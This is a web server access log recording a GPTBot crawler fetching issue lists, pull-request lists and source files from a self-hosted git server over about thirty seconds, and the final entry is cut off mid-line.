+[17/Feb/2026:18:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fdist%2fPostgresPatrol.exe" [Client 74.7.227.38] [Length 19793] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=all&type=all" [Client 74.7.227.38] [Length 10097] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:18:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13476] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:18:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10257] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10266] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:18:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=rendered" [Client 74.7.227.38] [Length 12327] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:18:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=source" [Client 74.7.227.38] [Length 13791] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:18:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 21810] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:18:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 11095] [Gzip 3.05] [Sent-to 